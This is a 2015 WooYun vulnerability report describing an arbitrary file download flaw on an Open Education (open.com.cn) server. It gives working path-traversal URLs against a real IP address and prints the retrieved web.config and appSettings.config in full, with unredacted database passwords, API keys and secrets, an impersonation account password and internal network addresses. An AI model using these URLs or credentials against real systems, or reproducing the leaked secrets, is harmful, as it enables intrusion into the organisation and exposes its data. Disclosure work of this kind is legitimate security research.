当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123944

漏洞标题:奥鹏教育某站文件任意下载

相关厂商:open.com.cn

漏洞作者: 路人甲

提交时间:2015-07-01 18:56

修复时间:2015-08-20 10:00

公开时间:2015-08-20 10:00

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

第一我还差点Rank 换点东西。
第二近段时间好多人在找你们公司漏洞。
第三此次获得的东西绝不流出。
说的我好正经啊。。我都受不了了。。
我只想说我会保密的
这个地址是下载安卓APK的地址。。。
http://115.182.41.33:8055/Home/Download?name=../../web.config
经过小小的修改,然后就(嘿嘿嘿嘿哈哈哈)
稍微看了看贵公司的代码。。。。
我想问一句。。还要程序员不
http://115.182.41.33:8055/Home/Download?name=../../web.config
http://115.182.41.33:8055/Home/Download?name=../../appSettings.config
我不会告诉你这是华丽的分割线。好东西来了,审核通过请帮忙打码
=========================================================================================
<?xml version="1.0"?>
<appSettings>

<!-- 资源路径配置开始 -->
<!--
网站静态资源
StaticResourceRoot
|-JS js脚本
|-CSS 样式表
|-Image 图片
|-Html 静态页面
|-Media 影、音
|-Flash flash
-->
<add key="StaticResourceRoot" value="~/Content"/>
<!-- 资源路径配置结束 -->
<!-- 应用区域配置开始 -->
<add key="Application.InternalMsg" value="Communication"/>
<add key="Application.VideoRoom" value="Communication"/>
<add key="Application.Chat" value="Communication"/>
<!-- 应用区域配置结束 -->
<!-- 开始“教学行为记录数据库链接配置” -->

<!-- 测试库(暂时就用这个测试库做开发) -->
<add key="BehaviorConnection" value="Data Source=10.100.132.206\SQL2008,1499; Initial Catalog=Behavior; User Id=openEDU; Password=!QAZ@WSX;"/>
<!-- 云开大正式 -->
<!--<add key="BehaviorConnection" value="Data Source=192.168.130.150; Initial Catalog=Behavior; User Id=openEDU; Password=!QAZ@WSX;"/>-->
<!-- 苏州大学(跳转) -->
<!--<add key="BehaviorConnection" value="Data Source=10.100.133.215; Initial Catalog=Behavior; User Id=cou; Password=m12345678;"/>-->
<!-- 奥鹏学生服务中心(跳转) -->
<!--<add key="BehaviorConnection" value="Data Source=10.100.133.172; Initial Catalog=Behavior; User Id=openEDU; Password=!QAZ@WSX;"/>-->

<!-- 结束“教学行为记录数据库链接配置” -->
<!-- 内部异常是,是否显示更多! -->
<add key="Exception.ShowMore" value="true"/>
<add key="ClientValidationEnabled" value="true"/>
<add key="UnobtrusiveJavaScriptEnabled" value="true"/>
<!-- JS版本号-->
<add key="JSVersion" value="20120810.1"/>
<!-- CSS版本号-->
<add key="CSSVersion" value="20120810.1"/>
<!-- 保存剪贴板图片的服务器路径-->
<add key="ClipboardRealPath" value="~/Content/Upload/Clipboard" />
<add key="ClipboardImgPath" value="/Content/Upload/Clipboard/" />
<!-- 允许的域名,多个域名间以逗号分隔-->
<add key="AllowDomain" value="localhost,10.96.141.46"/>
<add key="MasterHostWeb" value="1"/>
<add key="Cou.Login.NeedValidCode" value="0"/>
<!-- Flex聊天室-->
<add key="FlexChatRoom.RtmpServer" value="rtmp://115.182.41.33:5003/IM"/>
<add key="FlexChatRoom.RtmpServerConsole" value="http://115.182.41.33:8060/default.aspx"/>
<add key="FlexChatRoom.aspServer" value="http://115.182.41.33:8060/Gateway.aspx"/>
<add key="FlexChatRoom.GetMessageInterval" value="60000"/>
<!-- Flex录音机配置 -->
<!-- flex asf 服务器地址 -->
<add key="FlexRecorder.RtmpServer" value="rtmp://115.182.41.33:5003/screenRecorder"/>
<!-- 最大录音时长:(单位毫秒) -->
<add key="FlexRecorder.RecordMaxLength" value="300000"/>
<!-- VirtualClassRoom配置 -->
<add key="VirtualClassRoom.UrlFormat" value="http://115.182.41.33:8057/MemberCenter/ClassRoom.aspx?ID={0}"/>
<add key="VirtualClassRoom.WebServiceUrl" value="http://115.182.41.33:8056/webservice/Memberservice.asmx"/>
<!--需要转换的文件类型-->
<add key="ResourceConverter.DocumentTypes" value=".doc,.docx,.dotx,.dotm,.dot,.txt,.rtf,.xls,.xlsx,.xml,.ppt,.pptx,.pptm,.potx,.ppsx,.ppsm,.potm,.pdf" />
<add key="ResourceConverter.VideoTypes" value=".avi,.mpg,.wmv,.3gp,.mov,.mp4,.asf,.asx,.flv,.dat,.vob,.wmv9,.rm,.rmvb,.mkv" />
<add key="ResourceConverter.AudioTypes" value=".wav,.wma,.amr,.mp3"/>
<!-- 上传任务文件配置 -->
<!-- value="~/Content/Upload/UserFiles/TXTS/" -->
<add key="ResourceConverter.ConvertTaskFilePath" value="\\10.100.133.202\Attachments\TXTS\" />
<add key="ResourceConverter.ConvertServer" value="http://10.100.133.170:6060/Convert/MainTask_ADD" />
<add key="ResourceConverter.AppKey" value="07D4FA3E71664AE5B344ABE8190707DC"/>
<add key="ResourceConverter.AppSecret" value="DB072E4534E9460C98E08C6D1AE7D2D2"/>
<add key="ResourceConverter.AppKey1" value="C0C99A69B624429EAAD52A9925781379"/>
<add key="ResourceConverter.AppSecret1" value="7D1FA1449B5942EE9A2CAB0EC3CAC3E7"/>
<add key="ResourceConverter.AppKey3" value="07D4FA3E71664AE5B344ABE819070OES"/>
<add key="ResourceConverter.AppSecret3" value="07D4FA3E71664AE5B344ABE819081OES"/>
<!-- 上传文件归类配置 -->
<!-- 文本类 -->
<add key="FileResourceType.Document" value=".doc,.docx,.ppt,.pptx,.xls,.xlsx,.vsd,.pot,.pps,.rtf,.pdf,.txt" />
<!-- 动画类 -->
<add key="FileResourceType.Animation" value=".flv,.swf" />
<!-- 音频类型 -->
<add key="FileResourceType.Audio" value=".mp3,.wav,.wma,.amr" />
<!-- 视音频类 -->
<add key="FileResourceType.AudioAndVidio" value=".avi,.mpg,.asf,.mpeg,.mpe,.m1v,.m2v,.mpv2,.mp2v,.dat,.ts,.tp,.tpr,.pva,.pss,.mp4,.m4v,.m4p,.m4b,.3gp,.3gpp,.3g2,.3gp2,.ogg,.mov,.qt,.amr,.rm,.ram,.rmvb,.rpm,.mkv,.wmv" />
<!-- 图片类 -->
<add key="FileResourceType.Picture" value=".gif,.jpg,.jpeg,.png,.bmp" />
<!-- 其他类型 -->
<add key="FileResourceType.Other" value=".rar,.zip" />
<!--
系统安全配置
-->
<add key="SystemSafeConfig.Enable" value="false"/>
<!-- Url加密口令 -->
<add key="SystemSafeConfig.UrlPassword" value="!@#$%^"/>
<add key="RequstServiceIP" value=""/>

<!-- 国开用户头像图片路径 -->
<add key="UserPhotoPathFromGuoKai" value="http://10.96.141.50:8081/FaceImage.aspx?username={0}&amp;width={1}&amp;height={2}"/>
<add key="UserAvatarKey" value="avatar_u{0}"/>
<add key="Cou.DataService.Available" value="1"/>
<add key="Cou.DataService.GuiTest" value="1"/>
<add key="Cou.DataService.ResponseFormat" value="JSON"/>
<add key="Cou.DataService.TokenTimeOutMinutes" value="30"/>
<add key="Cou.Forum.CanModifyAnyForum" value="1"/>
<add key="Cou.TeachCircle.Passport" value="Cou2013)^@%"/>
<!-- 特定版本配置 -->
<!--
0: 标准版本
1:苏州大学定制版本(需要检查学生是.
都学完该章节的全部讲课内容,并且提交了其所有的作业才允许进入下一章节;没有学完该章节全部内容不能开始做该章节的作业)
2: 云开大
3:OES跳转
4: 广东番禺成教
99: 开发版本
-->
<add key="Cou.VersionNumber" value="0"/>
</appSettings>
=================================================================================
<?xml version="1.0"?>
<!--
For more information on how to configure your ASP.NET application, please visit
http://go.microsoft.com/fwlink/?LinkId=152368
-->
<configuration>
<!-- 配置节解析器 -->
<configSections>
<!-- razor视图引擎解析器 -->
<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" />
<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" />
</sectionGroup>

</configSections>

<!-- 应用参数配置 -->
<appSettings configSource="appSettings.config"/>

<system.web>
<caching>
<outputCacheSettings>
<outputCacheProfiles>
<!--为了提高课程首页的响应,在首页中加入了页面缓存。缓存时间为30秒。-->
<add name="CourseBlockViews" duration="30" varyByParam="CourseID;IsLarge"/>
</outputCacheProfiles>
</outputCacheSettings>
</caching>
<identity impersonate="true" userName="couservice" password="!QAZ@WSX"/>
<customErrors mode="On"/>

<httpRuntime maxRequestLength="1024000" executionTimeout="600" requestValidationMode="2.0"/>
<compilation debug="true" targetFramework="4.0">
<assemblies>
<add assembly="System.Web.Abstractions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
<add assembly="System.Web.Helpers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
<add assembly="System.Web.Routing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
<add assembly="System.Web.Mvc, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
<add assembly="System.Web.WebPages, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
</assemblies>
</compilation>
<authentication mode="Forms">
<forms loginUrl="~/Account/LogOn" timeout="2880" />
</authentication>
<httpModules>
<add name="UserContextHttpModule" type="Cou.Web.Base.UserContextHttpModule,Cou.Web.Base"/>
</httpModules>

<pages>
<namespaces>
<add namespace="System.Web.Helpers" />
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Routing" />
<add namespace="System.Web.WebPages"/>
</namespaces>
</pages>
</system.web>
<!-- razor配置 -->
<system.web.webPages.razor>
<host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
<pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Routing" />
<!-- 视图内默认引入的命名空间 -->
<add namespace="Cou.Web" />
<add namespace="Cou.Web.Helper" />
</namespaces>
</pages>
</system.web.webPages.razor>
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules runAllManagedModulesForAllRequests="true"/>
</system.webServer>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="System.Web.Mvc" publicKeyToken="31bf3856ad364e35" />
<bindingRedirect oldVersion="1.0.0.0-2.0.0.0" newVersion="3.0.0.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>

详细说明:

漏洞证明:

1.png

2.png

修复方案:

你们懂得,不行就放开代码 让我来!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-06 09:59

厂商回复:

通知研发进行修补

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-02 22:01 | hh2014 ( 普通白帽子 | Rank:225 漏洞数:39 | 继续)

    擦,都提交在描述里面了,还需要打码么。。。

  2. 2015-07-03 10:08 | hackyandi ( 普通白帽子 | Rank:111 漏洞数:16 | 一个没有梦想的人)

    @hh2014 走点官方的啊。。说还是要这么说的啊。。。本来想麻烦一下官方打码的。。